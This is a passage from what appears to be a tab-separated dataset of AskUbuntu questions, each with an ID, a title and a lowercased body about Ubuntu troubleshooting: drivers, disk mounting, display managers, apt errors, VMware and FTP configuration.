( polkit-gnome-authentication-agent-1:15971 ) : polkit-gnome-1-warning ** : unable to determine the session we are in : no session for pid 15971 ( the ... lines are warnings from gtk about missing css files etc. ) . polkitd is running : $ pidof polkitd 1495 is there something i am missing ?
303312	wifi disconnects every so often with broadcom bcm4331 , even with 13.04 .	my wifi connection drops about every few minutes or so , and the only way to reconnect is to disable wireless , reenable it , and reconnect . as you can imagine , this is really annoying . there are similar questions to this one , but the solutions they offer are to install ubuntu 13.04 , which i 'm already running . └─ > lspci | grep 802 03:00.0 network controller : broadcom corporation bcm4331 802.11a/b/g/n ( rev 02 ) └─ > lsmod | grep b43 b43 378642 0 mac80211 606457 2 b43 , zd1211rw cfg80211 510937 3 b43 , mac80211 , zd1211rw ssb 56986 1 b43 bcma 41051 1 b43
303313	vlc remote access hide	how can i configure vlc so that the host does n't appear when searching for hosts from app like remote vlc ? unfortunately i ca n't get a static ip for my android phone so i ca n't restrict the access to one ip , but would like at least not to show up on other devices on the network .
303316	on ubuntu 12.04.2 , what happens if i disable dnsmasq ?	i am using ubuntu 12.04.2 lts . if i issue the following command sudo gedit /etc/networkmanager/networkmanager.conf and change the line dns=dnsmasq to # dns=dnsmasq what will happen ? will i disable or enable dns caching ? additional notes : i have been told that since i am using a vpn service , it would be better for me to do the above .
303318	any alternative for microsoft onenote in ubuntu ?	after a major migration from windows to ubuntu 12.0.4 lts , i have found that i can find a substitute for pretty much everything i worked with on windows 7. the libreoffice package is an all-out package that can easily meet every requirements and satisfy needs , but there is one thing missing from the equation and that is an application that can open onenote files with .one extension in ubuntu and kubuntu ( debian ) . it is a huge hole in there for me to lament about everyday since my students do their homework in onenote notebooks , i have to switch to windows every time , which is like going back to drive a rundown junk car after buying a mercedes s500 and driving it for a while . it is so dramatically sad . what should i do ?
303319	cant move files to trash	somehow i can not move files to trash . the strange thing is , that it works on the desktop-folder , but in other folders it does n't . what a tried is a sudo chown -r wegsehen /home/wegsehen/* but nothing changed .
303321	error opening hard drives on 13.04	i 'm getting the following message while opening hard drives on 13.04 : error mounting /dev/sda3 at /media/teja/521c05aa1c0589e5 : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda3 '' `` /media/teja/521c05aa1c0589e5 '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda3 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . please solve , thanks in advance
303325	how to remove single file from /usr directory ?	i am using ubuntu 12.04 lts , and i want `` xnretro.desktop '' file to be removed from directory /usr/share/applications using terminal . how to do it ? i am new into linux & i know something like `` rm '' command is used , but i do n't wan na risk as there are many other files too in it . regards .
303329	ubuntu 13.04 - when maximized , window title blocks the maximize , minimize , and close buttons	you can access the menu bar when you bring your cursor up to the top ( as in the first image ) , but when i move it over to the x button to close the program or the maximize or minimize buttons , the title blocks it ( in the second image ) . is there any way to stop this from happening ?
303330	does anyone know how i can set the safe-volume for headphone in kde ?	i dont even know if this is the right term `` safe-volume '' ... .but i have just changed to kde and before i used mate . in mate when i plugged in my earphones ... ..the system immediately set the volume to , more or less , 60 % . which was great to protect my ears from loud noise if i previously had the volume set to 100 % . is there a way to set this in kde ? update . i have found a solution . veromix widget in kde can be set for headphones .
303333	random volume changes after starting games	i 've been having this problem for a while now , and even though i found a half-patch at some point perhaps someone can tell me how to properly solve it once and for all . essentially , certain games and applications ( super meat boy , braid , xbmc ) will make the volume go crazy , going up and down more or less at random ( although usually tending on the `` more '' side ) . after closing the application , if i switch to a console , i 'll see the cursor flashing rapidly ( something like 5 times per second or so ) for a while ( while the volume still goes crazy ) , until both problems stop at the same time ( the cursor goes back to normal , and the volume stabilizes ) . a patch i 've been using is , essentially , running the following script before any app which i know triggers this problem : xmodmap -e `` keycode 122 = 0x0000 '' xmodmap -e `` keycode 123 = 0x0000 '' this lines , essentially , are remapping the volume up/down keys to nothing , and that stops the problem from happening , but then again , it also causes my volume keys to stop working . can anyone help me understand what is going on here ? the only common thread between the applications seems to be the fact that they all make intensive use of graphics . i 'm running ubuntu 12.04 on an hp notebook , and even though this problem is now happening with cinnamon , it used to happen already on gnome 2 .
303335	driver bcm43277 not working propely . missing wlan0 interface	i have an acer 5253 and i had installed all the drivers . the wifi works fine but when i open a terminal it says : root @ zoli-aspire-5253 : /home/zoli # airmon-ng interface chipset driver eth1 unknown wl - [ phy1 ] root @ zoli-aspire-5253 : /home/zoli # any idea ?
303341	how to switch back from chrome os to ubuntu 12.04 on acer c7 chromebook ?	i have ubuntu 12.04 installed on my acer c7 chromebook . once i installed it , i never switched back to chrome os . but yesterday when i turned back home , i found that my laptop led was opened , and the chrome os was running . how can i turn back to my ubuntu 12.04 ? i usually had a screen that has a chrome logo on it every time i turn on my laptop . i always clicked ctrl+d to run ubuntu , but this screen is no longer exist when i reboot .
303344	new fonts breaking wine	i 'm running photoshop cs2 in wine because , well i 'm not a fan of the gimp sorry . it 's been perfectly stable up until today when i installed a couple of new fonts and now it is running out of memory and terminating application due to runtime errors . i 've re booted which seemed to make it happier on the ram issues but it still keeps terminating unexpectedly . from what i can tell wine automatically assigns ram so i 'm not sure how to address this issue , any ideas ?
303349	libreoffice ppa 4.1.x for latest ubuntu version	i am looking for a ppa that has libreoffice 4.1 . even though it is in beta i wish to test it out via a ppa . so is there a ppa that has the libreoffice 4.1.x branch ?
303357	my computer runs slower now on ubuntu	recently i have been noticing that my laptop 's speed has decreased after installing ubuntu . i am on a macbook pro and i have 4.2ghz and 4gb of ram . i used to play games like minecraft before on it and they ran fine with 60 fps . but now that i am in ubuntu , things do n't go as fast as they used to . i made minecraft run with 3gb of ram and i installed optifine , but it is still slow ! i do n't know what to do anymore !
303369	13.04 dual monitors on my desktop	i just upgraded to 13.04 from 12.04 . i was wondering how to use both of my monitors side by side in 13.04 . they work together in mirror but do not work side by side . i have looked through the `` tweak '' app and `` compiz '' and do not see the correct setting , am i missing something . additionally when i deselect the mirror button in the display app i lose the launcher and the title bars on my window and the ability to change windows . pretty scary stuff since 12.04 did not have this problem . please help ... .. i am online watching this post like a hawk so if you have any questions or need additional information please let me know .
303371	ca n't run ubuntu with windows 8	this is the same issue as another user , but due to protection , i could not add to it ( i am a new user and do n't have 300 reputation ) and none of the responses were solutions to the problem . unlike that user , i still want windows 8 so i do n't want to install over it . i have installed ubuntu alongside windows 8 in a partition drive d ( the hard drive came partitioned ) . based on problems with windows 8 reported by other users , i installed with secure boot disabled . after i restarted my computer and selected the ubuntu option . i got an error message : starting windows did n't succeed . the reason may be changing software . to solve this problem : insert installation disc of windows and reboot pc choose language settings and click next use repair if you do n't own this disk contact with the administrator . file : \ubuntu\winboot\wubildr.mbr state : 0xc000007b information : could not load application or operating system because of the lack of the required file or errors in this file windows 8 still boots if i choose that option , but when i choose ubuntu i get that error message . how can i make ubuntu work on windows 8 ?
303372	downloading ubuntu on a flashdrive	i am using a windows 7 home premium . please could you provide me step byt step procedures on how i can download ubuntu onto a flash drive and try it out on my pc before running it ?
303373	ubuntu10.04 ca n't mount usb automatically , and ca n't access lan via smb	my ubuntu10.04 ca n't mount usb automatically , i have to mount manually , and ca n't access lan via smb command , i have tested is ok via ping
303374	networkmanager editor ca n't edit wired connection	i 've just done a clean install of 13.04 and have been busy trying to get everything configured . i have a working setup at this point , but one item is annoying me . my wired connection ca n't be edited via the gnome settings panel , nor via nm-connection-editor . here 's what 's in /etc/network/interfaces # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto p3p1 iface p3p1 inet dhcp and here is the context of /etc/networkmanager/networkmanger.conf [ main ] plugins=ifupdown , keyfile dns=dnsmasq [ ifupdown ] managed=true my understanding is that the managed=true should allow me to control it via networkmanager . does that not include editing it ? fwiw , the issue for me is that i need to force dnsmasq use , but not resolvconf . the only way i could figure out to do this is to remove resolvconf . when resolvconf is installed , the dhcp nameservers get inserted into resolv.conf with is undesirable since it interferes with correct operation when i bring up my vpn . what i 've got works , it just seemed inelegant to have to do the hand edits and it was surprising that i could n't edit the configuration from the system settings control panel .
303376	juju wordpress deploy using lxc	since i use lxc alot , i 've been waiting for the new go version of juju to support lxc again for sometime now ! i just reinstalled juju .7 i am running ubuntu 13.04 my environment.yaml has - type : local i followed this example from juju .6 : https : //juju.ubuntu.com/docs/getting-started.html just to see if juju would deploy mysql and wordpress to the lxc containers both mysql and wordpress successfully deployed and started.. i did expose wordpress . $ juju status machines : 0 : agent-state : running dns-name : localhost instance-id : local instance-state : running services : mysql : charm : cs : precise/mysql-21 relations : cluster : - mysql db : - wordpress units : mysql/0 : agent-state : started machine : 0 public-address : 10.0.3.227 wordpress : charm : cs : precise/wordpress-15 exposed : true relations : db : - mysql loadbalancer : - wordpress units : wordpress/0 : agent-state : started machine : 0 open-ports : [ ] public-address : 10.0.3.123 relation-errors : db : - mysql 2013-06-02 21:27:49,612 info 'status ' command finished successfully i can ping the wordpress ip 10.0.3.123 from the host . but wordpress is not accessible from host via browser - i assume because wordpress still reports open-ports : [ ] but this is all on local machine and i guess i 'm asking is what should i have to do to open up port 80 to the juju wordpress container .
303380	how to install ubuntu 12.04 on ubuntu 8.04 ?	i have a dell latitude d600 and i installed ubuntu 8.04 lts on it but , i need to be able to watch youtube videos and i ca n't do that with the old version of firefox that is available on 8.04 lts . how can i get 12.04 on my dell ?
303392	unity dash graphical glitches in ubuntu 13.04 with ati graphics	i have a very noticeable transparent glitch in the unity dash . it does no transparency at all and instead shows a green to red color transition with black checkered boxes . this is an entirely different visual glitch than the one that affects intel graphics cards . this glitch only happens when i open the dash or the shutdown dialogs . when the dash is not open , the unity left bar displays as it should with no glitch . the computer that has this glitch is a 2008 toshiba satellite l355d-s7825 laptop . the graphics card is a ati radeon x1250 . this computer also has had very bad graphics performance on unity ever since ubuntu 11.10 , showing very choppy transitions and animations . i dual boot it with windows vista .
303394	repository fetch failure	these are the errors i get : ( as you can see , i connect to the internet from the education department proxy ) w : failed to fetch http : //au.archive.ubuntu.com/ubuntu/dists/quantal/release.gpg something wicked happened resolving 'educf.proxy.tas.edu.au:8080 ' ( -5 - no address associated with hostname ) w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/quantal/release.gpg something wicked happened resolving 'educf.proxy.tas.edu.au:8080 ' ( -5 - no address associated with hostname ) [ cut out some results , too many links ] e : some index files failed to download . they have been ignored , or old ones used instead .
303399	unity window button theme specification ?	i 'm trying to track down the specification of unity window button themes . by this i mean the specification specific to unity , ( /usr/share/themes/radiance/unity ) , not the gtk or metacity specifications ( /usr/share/themes/radiance/metacity-1 or /usr/share/themes/radiance/gtk-x.0 ) . the only themes i 've found that appear to use this specification are the radiance and ambiance ones ( in package light-themes ) . upon looking in /usr/share/themes/ ( ambiance|radiance ) /unity , i see the images : role.png role_focusstate_state.png where role is one of close , maximize , minimize or unmaximize ; focusstate is focused or unfocused ; state is normal , prelight or pressed . is there some specification on how to create a unity window theme ? which of the above files is required at minimum ? when each is used ? ( for example , is the close.png ever used if close_ [ focusstate ] _ [ state ] .png exists for all focus states and states already ? if so , when ? if not , why is close.png included with ambiance/radiance , which appear to cover all focus states and all states already ? )
303400	failed to start greeter	after some pretty advanced configuration and kernel compilation , i 've got efi booting and intel graphics enabled on my macbook pro 8,3 and the ati proprietary driver disabled in order to be able to save a lot of power and to keep the laptop a lot cooler in the process . however , i ca n't seem to get lightdm to start . my /etc/x11/xorg.conf looks like this : section `` device '' identifier `` device0 '' driver `` intel '' busid `` 0:2:0 '' endsection i stripped everything out to allow things to more or less autoconfigure , but i want to be sure that x tries loading the intel driver and not anything else . in my /var/log/lightdm/lightdm.log , i see the following : [ +0.00s ] debug : logging to /var/log/lightdm/lightdm.log [ +0.00s ] debug : starting light display manager 1.2.3 , uid=0 pid=14647 [ +0.00s ] debug : loaded configuration from /etc/lightdm/lightdm.conf [ +0.00s ] debug : using d-bus name org.freedesktop.displaymanager [ +0.00s ] debug : registered seat module xlocal [ +0.00s ] debug : registered seat module xremote [ +0.00s ] debug : adding default seat [ +0.00s ] debug : starting seat [ +0.00s ] debug : starting new display for greeter [ +0.00s ] debug : starting local x display [ +0.00s ] debug : using vt 7 [ +0.00s ] debug : activating vt 7 [ +0.00s ] debug : logging to /var/log/lightdm/x-0.log [ +0.01s ] debug : writing x server authority to /var/run/lightdm/root/:0 [ +0.01s ] debug : launching x server [ +0.01s ] debug : launching process 14651 : /usr/bin/x :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch [ +0.01s ] debug : waiting for ready signal from x server :0 [ +0.01s ] debug : acquired bus name org.freedesktop.displaymanager [ +0.01s ] debug : registering seat with bus path /org/freedesktop/displaymanager/seat0 [ +0.30s ] debug : got signal 10 from process 14651 [ +0.30s ] debug : got signal from x server :0 [ +0.30s ] debug : connecting to xserver :0 [ +0.31s ] debug : starting greeter [ +0.31s ] debug : started session 14656 with service 'lightdm ' , username 'lightdm' [ +0.35s ] debug : session 14656 authentication complete with return value 0 : success [ +0.35s ] debug : greeter authorized [ +0.35s ] debug : logging to /var/log/lightdm/x-0-greeter.log [ +0.35s ] debug : session 14656 running command /usr/lib/lightdm/lightdm-greeter-session /usr/share/xgreeters/pantheon-greeter [ +0.60s ] debug : greeter closed communication channel [ +0.60s ] debug : session 14656 exited with return value 0 [ +0.60s ] debug : greeter quit [ +0.60s ] debug : failed to start greeter [ +0.60s ] debug : stopping display [ +0.60s ] debug : sending signal 15 to process 14651 [ +0.97s ] debug : process 14651 exited with return value 0 [ +0.97s ] debug : x server stopped [ +0.97s ] debug : removing x server authority /var/run/lightdm/root/:0 [ +0.97s ] debug : releasing vt 7 [ +0.97s ] debug : display server stopped [ +0.97s ] debug : display stopped [ +0.97s ] debug : stopping x local seat , failed to start a display [ +0.97s ] debug : stopping seat [ +0.97s ] debug : seat stopped [ +0.97s ] debug : required seat has stopped [ +0.97s ] debug : stopping display manager [ +0.97s ] debug : display manager stopped [ +0.97s ] debug : stopping daemon [ +0.98s ] debug : exiting with return value 1 it seems to fail to start the greeter , but it does n't get any more descriptive than this . i ca n't seem to find any other related logs . in the xorg.0.log , i see this error : [ 477.378 ] ( ee ) glx error : can not get required symbols . i do n't know if this has anything to do with this issue , but yeah . any ideas on why lightdm wo n't start ? i was able to get x itself to start with sudo startx , but the greeter just wo n't launch : (
303406	external usb drive getting mounted as ro	mount displays : /dev/sdc2 on /media/my book type hfsplus ( ro , nosuid , nodev , uhelper=udisks ) is there a way to mount this as rw , and copy data . this was working with mac osx , and on mac its no loger getting mounted , and on ubuntu , i see it as being mounted as read only .
303407	e : malformed line 1 in source list /etc/apt/sources.list.d/bitdefender.list ( dist ) e : the list of sources could not be read	i 'm getting the message e : malformed line 1 in source list /etc/apt/sources.list.d/bitdefender.list ( dist ) e : the list of sources could not be readwhen i try to open software centre through terminal and a red stop sign at the top of my screen. > i know the reason for the problem , i tried installing a free bitdefender security , but do n't know how to fix it and delete the malformed line , any help would be greatly appreciated .
303408	boot up with usb or external hard drive	can ubuntu be used in a computer with no internal hard drive ? using only a usb or external hard drive best regards , brian
303409	unable to install ubuntu from usb drive	i was installing windows and suddenly it showed msg that computer could install windows as it was unable to retrive some files ever since than when ever i m trying to install windows it show status 0xc000000f . since i was unable to install windows , i am trying to install ubuntu . i made a bootable flash drive using 'unetbootin ' but when installing i dont get option install ubuntu and other option i only get default as a option .
303411	nested sequence of directories !	when i searched for a file where one could ( semi ) control brightness i accidentally found a nested sequence of directories like below aneesh @ nb-14 : ~ $ cd /sys/class/graphics/fb0/device aneesh @ nb-14 : /sys/class/graphics/fb0/device $ cd graphics/fb0/device aneesh @ nb-14 : /sys/class/graphics/fb0/device/graphics/fb0/device $ l driver @ graphics/ modalias power/ subsystem @ uevent aneesh @ nb-14 : /sys/class/graphics/fb0/device/graphics/fb0/device $ what is the motive behind having such nested sequences of directories ? how was this possible ? i figured out one possible answer to that . e.g . : for creating a sequence /a/b/a/b/a/b ... , one can create a link to the directory /a and paste it in the folder /a/b . is this the only way nested sequences can be formed ? symbolically it 's not obvious : to verify this i tried giving command l ( see above ) and found symbols against each file/directory . i learnt from this forum itself that in the result of l , the symbol @ is for indicating drivers and / for directories . but no symbolic indication to show that a certain folder is actually a link to another one ! also , there 's no manual entry about l to find which symbol ( if any ) indicates file link .
303415	ubuntu 13.04 ralink rt5390 wo n't work after upgrade,	i have an hp 2000 notebook dualboot with win7 and ubuntu 13.04 . after i upgraded from 12.10 , the wireless network detects wifi but when i try connecting it wont do anything . i try doing stuff from those websites how do i install a bz2.bz2 file ? but i get errors at make and from here http : //ubuntuforums.org/showthread.php ? t=2138302 but since i 'm barely new here i do n't know how to make the patch to work . please help .
303416	sound on install 13.04	once i install 13.04 from 12.10 the sound on my lg laptop stopped working . i installed 13.10 hoping the bug was fixed but alas while the sound worked the laptop keyboard would n't work . any ideas ? i upgraded from 12.10 originally because of problems with my second screen . are these known bugs or am i doing something wrong ? it appears i will have to stick to good old windows for some time yet .
303423	no sound with banshee , amarok and rhythmbox	i have this problem that when i click play on any of these players the song `` plays '' , but there 's no sound . i am using kde . the problem began when i tried to add the play button of banshee to a global hotkey . also videos wo n't play at all , and freeze banshee .
303425	ubuntu 12.04lts and virtualbox	when i used win xp as virtual machine under 10.04lts , it worked fine . we shared printers attached for win machines with different ip address . no issue . stable and reliable . on upgrading the server to 12.04lts , the usb port sharing has not been effective . the printer works sometime . not reliable at all . i have registered vbox as advised on their website . have installed latest extension packs . but no go . running 64bit kernel 3.5 . any solutions ?
303427	are we not supposed to have unallocated hard disk space during ubuntu installation ?	i 've a hp pavilion g6 2320tx laptop with pre installed windows 8 . while installing ubuntu 13.04 64-bit from a usb created with pendrive linux , i did n't get the option to do partition like the one shown in : http : //www.ubuntu.com/download/desktop/install-desktop-latest . i had an unallocated space of 42 gb in my hard disk . the installation used that space . i could n't boot ubuntu . i corrected it using boot repair , but i get a lot of extra options than the normal grub screen . the boot repair link is : http : //paste.ubuntu.com/5725287/ . is it possible that the installation went wrong because i had unallocated space and so did n't use the partition during installation ?
303429	how to close utorrent under wine cleanly ?	i run utorrent under wine on ubuntu ( utorrent ver 2.0.6 i think ) . is there a command line equivalent to clicking the close box or choosing file-exit ? i can find the process number using ps -ax | grep utorrent , then do a kill < processnumber > but presumably this does n't give utorrent time to close cleanly , which might be important if it needs to write a chunk to disk .
303438	wake up ubuntu 13.04 from sleep using usb	i have ubuntu 13.04 64 bit x86 on my laptop and i am trying to make it possible to wake up using my wireless keyboard , thus i need to enable wake up on usb . i have read several guides but it simply does not work . i need to enable usbx below . please make the guide very easy to follow . thanks ! when i use windows i can wake the computer from sleep using the same keyboard . look below in the list on the usb there are no pci connected and on these items that do not have a pci listed i can not change disable to enable . i.e i manged to change disable to enable by using the command sudo sh -c `` echo rp04 > /proc/acpi/wakeup for the rp04 device and this is possible because there is a pci listed on this device . so how do i add a pci to the usb devices is this possible due to hardware ? ? ? if i purchase a usb card will this have a pci listed on it ? ? i am guessing that the usb are connected directly to the mother board . thanks ! p0p1 s4 *disabled peg0 s4 *disabled peg1 s4 *disabled peg2 s4 *disabled peg3 s4 *disabled xhc1 s3 *enabled pci:0000:00:14.0 ehc1 s3 *enabled pci:0000:00:1d.0 usb1 s3 *disabled usb2 s3 *disabled usb3 s3 *disabled usb4 s3 *disabled ehc2 s3 *enabled pci:0000:00:1a.0 usb5 s3 *disabled usb6 s3 *disabled usb7 s3 *disabled hdef s4 *enabled pci:0000:00:1b.0 rp05 s4 *disabled rp06 s4 *disabled rp07 s4 *disabled rp08 s4 *disabled wlan s3 *enabled pci:0000:02:00.0 rp03 s4 *disabled xhci s3 *disabled rp04 s4 *enabled pci:0000:00:1c.3 glan s4 *enabled pci:0000:03:00.2 xhc s4 *disabled slpb s4 *disabled
303442	how to change the timeout of directories mounted with ecryptfs-mount-private	when i mount my encrypted .private data , i can access ( rw ) my data fine . after a while the mount seems to be unmounted automatically . is there a default timeout ? if so , how can i change it ? the timeout appears to be fairly short ( order of a few minutes ) and seems to occur when i try to access the share remotely using rsync ( i.e . via ssh ) . i did n't find anything when searching for 'time ' in the man pages of ecryptfs-mount-private , ecryptfs-setup-private , ecryptfs or ecryptfsd .
303443	graphic problem after updating ubuntu 13.04	i had a very stable and functional ubuntu 13.04 until yesterday that i accepted to update the system . after the update files were downloaded , the updater told me that some packages are not needed any more and asked if it should remove them . i answered yes , and the updater deleted the old packages . after a restart i faced this strange problem . my desktop is dead , there is no wallpaper , and every notification stays on the desktop . any suggestions ? i have no idea what the updates were about or what packages i deleted . i have a lenovo w520 machine . with nvidia , quadro 1000m , optimus driver installed . i had installed the bumblebee package . i just noticed that the ubuntu software center crashes after a few seconds .
303444	why is tint2 blank in openbox but not in unity/gnome shell	i 'm playing around with tint2 and openbox . first all went fine , but suddenly there are no icons , systray etc . shown in tint2 . just a black panel . but only in opebnox . when starting tint2 in gnome or unity , all icons are there . when starting tint2 in openbox from terminal , i got the following message ( s ) : tint2 : not icon swallow what does that mean and how can i solve this ? btw : i 'm using ubuntu 13.04 . thank you in advance for any help .
303452	ca n't shut down in gnome-shell 3.8	for the past month or so i 've been unable to shut down or reboot my pc from gnome-shell . i am running 3.8 from the staging ppa which is otherwise working beautifully . when i attempt to shut down or reboot it gets as far as stripping the themes from applications and then goes no further . in order to shut down i have to open a terminal emulator and sudo shutdown -h now . running gnome-session-quit -- power-off does not yield any terminal output .
303454	get information about a video from command-line tool	how can i get information about a video with a command-line tool ? ( e.g . video duration , audio codec , bitrate etc )
303455	how do i restrict usb access ?	i am the system administrator on a network using a single ubuntu 12.04 computer as a server and several windows ( xp ) clients . is it possible to restrict users from accessing usb storage devices on their windows machines from the ubuntu server ? note : these machines may have other non storage devices connected via usb such as keyboards and mice which must not be affected by this . i am aware i can block access on a client by client basis from the windows side by following the instructions from microsoft here : how can i prevent users from connecting to a usb storage device ? but i want to be able to enforce this from the ubuntu side . is this possible and if so how ?
303456	using deja dup to backup my ubuntu to a windows shared folder	i have a ubuntu 12.04 running and have certain things installed like samba , nagios and likewise-open to have my ubuntu join a windows domain . this all works correctly . i am not an expert in linux although i do know some basics . what i am trying to do is use deja-dup to backup my ubuntu machine to a windows shared folder with the windows-share method ? at the server line i filled in the ip-address of my windows server . at the folder i put /smb : // '' mywindowsserver '' /folder username is the username i created for backing up . ( i have read somewhere that it usually works to have the same usernames on a windows server and ubuntu machine with backing up ) domain name my domain name . i am not sure i have the syntax right at the folder it is supposed to back up to when i click backup now it does connect to the windows server and it asks for a password . after i fill it in and press enter it says that it ca n't mount the windows share . when i go to that server with ubuntu file explorer , it just connects and mounts the folder fine . has this something to do with permissions ? or am i doing something wrong ?
303459	my keyboard does n't respond when i try to reset a lost administrative password	my keyboard stops responding when i get to enter new unix password : retype new unix password : passwd : password updated successfully root @ ubuntu : ~ # what am i doing wrong ?
303467	is there an alternative to the skype service ?	on ubuntu 13.04 skype segfaults constantly ( i 've read a couple of threads about fixing the issue and it is kind of works now expect it segfaults every time chat message comes in ) so i 'm thinking it is time to find it a replacement . which one should i choose ? ok , i 've seen previous post , yet only one answer in it highlights some alternatives . also i want no the alternative skype client , but the whole ecosystem . the one alternative presented oovoo does not support linux and other goober shows unresolved dependency : libglew1.5
303473	facebook account	ubuntu 13.04 . if i try to connect facebook from online accounts ( i mean the option in ubuntu general settings ) , i see a small browser window with title signon-ui appearing , but remaining empty . then , a browser tab appears , with address https : //www.facebook.com/connect/blank.html # _=_ '' and content success followed by a string , something like : ( i 'm translating here , actual message is localized in my language ) . security advice . take this url as if it would be a password and do not share it with anyone . annoying problem is that such tab is keep appearing randomly . how can i fix it ? if not possible , is there 's a setting to disable online accounts ?
303474	installing ubuntu 13 on clean mac ?	i have a cleanly wiped macbook pro . when i say cleanly wiped i mean the only way the computer will turn on is if i run it in recovery mode . i was given it for free the other day from my friend as he was upgrading , but it currently has no installation of osx on it . is their a way to install ubuntu through the terminal or another manner ? any suggestions would be awesome . sparkeyy
303478	torrents downloaded using python urllib2 fail to open in bittorrent client	i 've been using python to download torrents for some time but for about a week or more , those torrent files have stopped opening in transmission . here is the code : torrent = urllib2.urlopen ( torrent url , timeout = 30 ) output = open ( 'mytorrent.torrent ' , 'wb ' ) output.write ( torrent.read ( ) ) this used to work fine in the past but now it wo n't load in transmission . i tried another client 'tixati ' which threw up an error `` error parsing meta-file '' . if i download the torrent file via browser , it opens fine in both clients . i 've tried changing file options to output = open ( 'mytorrent.torrent ' , 'w ' ) but the result is the same . anybody have any ideas ?
303484	problem with amd hd 8xxx series graphics card	i bought a dell inspiron 17r 5721 it has 2 graphics cards , an intel ( r ) hd graphics 4000 and a amd radeon hd 8730m . intel 's card ( on board ) works just fine after doing what it says in this article . with amd 's card , no such luck . i 've tried to install the catalyst drivers that ubuntu suggests but no luck . i checked on amd 's website for drivers , it 's in version 13.04 for about a month and some now , and that version , does n't list my card as supported . does anyone know if i can make my graphics card work with ubuntu 12.04 ?
303487	curl-config error during installation of package	whhile installing free radius protobuf package i am getting following error root @ ggns2egl01 : /tmp/rlm_protobuf-freeradius-2.1.x # ./configure checking for gcc ... gcc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking for ranlib ... ranlib checking for a bsd-compatible install ... /usr/bin/install -c checking whether ln -s works ... yes checking whether make sets $ ( make ) ... yes checking for curl-config ... no *** the curl-config script could not be found . make sure it is *** in your path , and that curl is properly installed . *** or see http : //curl.haxx.se/ configure : error : library requirements ( curl ) not met . i installed curl package but getting same error my machine details are as follows root @ ggns2egl01 : /tmp/rlm_protobuf-freeradius-2.1.x # uname -a linux ggns2egl01 3.2.0-23-generic # 36-ubuntu smp tue apr 10 20:39:51 utc 2012 x86_64 x86_64 x86_64 gnu/linux i also tried to install packages which have curl-config command but those packages have lots of dependency . root @ ggns2egl01 : /tmp/rlm_protobuf-freeradius-2.1.x # curl-config the program 'curl-config ' can be found in the following packages : * libcurl4-gnutls-dev * libcurl4-nss-dev * libcurl4-openssl-dev root @ ggns2egl01 : /tmp/rlm_protobuf-freeradius-2.1.x # apt-get install libcurl4-gnutls-dev reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : curl : depends : libc6 ( > = 2.17 ) but 2.15-0ubuntu10.2 is to be installed libc6-dev : depends : libc6 ( = 2.15-0ubuntu10 ) but 2.15-0ubuntu10.2 is to be installed libcurl3 : depends : libc6 ( > = 2.17 ) but 2.15-0ubuntu10.2 is to be installed libcurl4-gnutls-dev : depends : libcurl3-gnutls ( = 7.22.0-3ubuntu4.1 ) but 7.22.0-3ubuntu4 is to be installed depends : libgnutls-dev but it is not going to be installed depends : libidn11-dev but it is not going to be installed depends : libkrb5-dev but it is not going to be installed depends : libldap2-dev but it is not going to be installed depends : librtmp-dev but it is not going to be installed depends : zlib1g-dev but it is not going to be installed
303490	ubuntu intel i5 processor performance	i 've noticed very bad performance on my intel i5 / 8gb machine . here is what the processor activity looks like . every time i run another applications the processor changes to the next one . i creating a virtualbox vdi during this test . the whole time it will use one processor and switch to the next one every minute or so . if i try to open firefox or the file browser it will run so sluggish with major lag . this machine ca n't do more then 1 thing at a time ... your help would be great ! p.s . just clicking on about this computer took about 40 seconds to open .
303492	desktop locked at resume ( kubuntu 13.04 )	the system suspends correctly but when it resumes the desktop seems to be locked . no user/password dialog opens , the desktop displays the state of suspend time but it does not respond to mouse clicks nor to keyboard . mouse pointer , however , moves . i have to restart pushing power button . more details in launchpad report : http : //bugs.launchpad.net/ubuntu/+source/pm-utils/+bug/1181237 thanks .
303493	vmware player pauses often	i 'm using a 64bit windows 8 inside vmplayer , with 2 virtual processor cores , virtual hard disk resides on a fast local disc and is not preallocated ; host cpu is intel i7 3770 , should be capable of hardware virtualisation but i do n't know if vmware uses it ; nat networking ; sound card connected , usb connected , accelerated 3d graphics ( nvidia 313.30 on host ) my problem is , that the vm often pauses for a few seconds , and then speeds up for a few seconds to reach real time again . time in the vm actually moves faster after the pause , for example all animations using timers speed up . when running , the vmware-vmx process shows ~150 % cpu usage in top , but 0 % when pausing ( and d state i.e . waiting for io ) . iotop shows normal disk writes from vmware-vmx threads , but during pauses , the flush kernel thread uses 99 % . are there some options to try so that vmware does n't wait for io ? i 've tried a few things available from the gui but the issue never went awayâś
303494	allow anonymous users to upload in /var/www	im fully aware the risk of this setup regarding anonymous upload , but basically , i want anonymous users to upload on my webserver /var/www im using vsftpd btw i did mount -- bind /var/www /home/upload and chmod 777 both dir my vsftpd.conf listen=yes anonymous_enable=yes write_enable=yes anon_upload_enable=yes anon_root=/home/upload anon_mkdir_write_enable=yes chroot_local_user=yes when i access ftp using filezilla i get this : response : 500 oops : vsftpd : refusing to run with writable root inside chroot ( ) error : critical error error : could not connect to server please tell me what else did i missed , ive been playing around the configuration , i cant seem to make it work correctly .
303497	adding an entry to fstab	i 've unmounted a disk /dev/vdc1 on my machine , after i format it into xfs file system , i did n't mount it again , either did n't add the adequate line to fstab file . now when i want to mount this partition , but i ca n't access to it : mount : ca n't find dev/vdc1 in /etc/fstab or /etc/mtab . so how should i put in fstab file so the system recognizes it again ? the partition was mounted on /data
